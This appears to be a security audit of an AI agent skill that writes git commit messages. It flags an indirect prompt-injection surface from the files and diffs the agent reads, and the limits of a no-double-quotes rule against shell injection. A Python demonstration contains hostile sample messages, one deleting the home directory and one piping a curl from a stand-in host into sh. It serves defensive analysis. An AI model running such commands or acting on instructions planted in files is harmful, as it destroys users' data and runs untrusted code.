git-commit-message
Pass
Audited by Gen Agent Trust Hub on Mar 8, 2026
Risk Level: SAFE
Findings: COMMAND_EXECUTION, PROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: The skill uses the run_command tool to execute git operations, including git status, git diff, and a combined git add . && git commit command. Although git add . is a broad operation that stages every change in the working directory, it is consistent with the skill's stated purpose of committing changes.
- [PROMPT_INJECTION]: The skill processes untrusted data from local files, via view_file and git diff, to generate its output. This creates an indirect prompt injection surface: malicious content in the files being committed could attempt to influence the agent's behavior.
- [PROMPT_INJECTION]: The skill states an explicit security constraint: "NEVER use double quotes (") in the commit message content". This acts as a manual sanitization measure that keeps the generated text from closing the double-quoted argument in the git commit -m "..." command, mitigating the simplest form of command injection (a quote that ends the -m argument and lets the rest of the message run as shell). Note that in a POSIX shell a double-quoted string still undergoes $(...), backtick and ${...} expansion, so the constraint addresses delimiter break-out only and does not by itself neutralize every shell metacharacter.
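The following is an added illustration, not part of the audit and not the skill's own code. It models the two ways a generated commit message can reach git: interpolated into a shell string (the pattern the audit describes) versus passed as a single argv element with no shell involved. The function names, the tokeniser-based check and the sample messages are constructed for this example; shlex is used to approximate how a POSIX shell would split the command line.

```python
import shlex
import subprocess
from typing import List

# Hypothetical helpers written for this example (not from the audited skill).


def build_shell_command(message: str) -> str:
    """The fragile pattern: interpolate the message into a shell string."""
    return f'git add . && git commit -m "{message}"'


def tokens_after_m(command: str) -> List[str]:
    """Split the command the way a POSIX shell tokenises it and return
    everything after -m. For a well-formed command this is exactly one
    element: the commit message. More than one element means the message
    escaped its double quotes and the remainder would run as shell."""
    argv = shlex.split(command)
    return argv[argv.index("-m") + 1:]


def violates_quote_rule(message: str) -> bool:
    """The skill's stated constraint: NEVER use double quotes."""
    return '"' in message


def has_residual_expansion(message: str) -> bool:
    """Constructs that a POSIX shell still expands inside double quotes.
    The quote rule does not catch these, and neither does tokenising,
    because they stay inside the quoted string."""
    return any(marker in message for marker in ("$(", "`", "${"))


def commit_argv(message: str) -> List[str]:
    """Hardened form: the message is one argv element and no shell parses
    it, so quotes, semicolons and $(...) are just bytes in the message."""
    return ["git", "commit", "-m", message]


def commit(message: str, dry_run: bool = True) -> List[str]:
    """Run git commit without a shell (dry_run=True only builds argv)."""
    argv = commit_argv(message)
    if not dry_run:
        subprocess.run(argv, check=True)  # no shell=True, no interpolation
    return argv


if __name__ == "__main__":
    # Constructed sample messages for demonstration.
    benign = "fix: handle empty input"
    breakout = 'fix bug" ; rm -rf ~ ; echo "'
    sneaky = "fix: $(curl http://example.invalid | sh)"
    for msg in (benign, breakout, sneaky):
        print(repr(msg))
        print("  quote rule violated:", violates_quote_rule(msg))
        print("  tokens after -m   :", tokens_after_m(build_shell_command(msg)))
        print("  residual expansion:", has_residual_expansion(msg))
        print("  hardened argv     :", commit(msg))
```

The breakout message is rejected by the quote rule and visibly splits into extra shell tokens; the sneaky message passes the quote rule and tokenises as a single argument, yet a real shell would still execute the $(...) substitution. Passing the message as argv (commit_argv) removes the shell from the path entirely, which is the check a practitioner would want alongside the skill's prompt-level constraint.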
Audit Metadata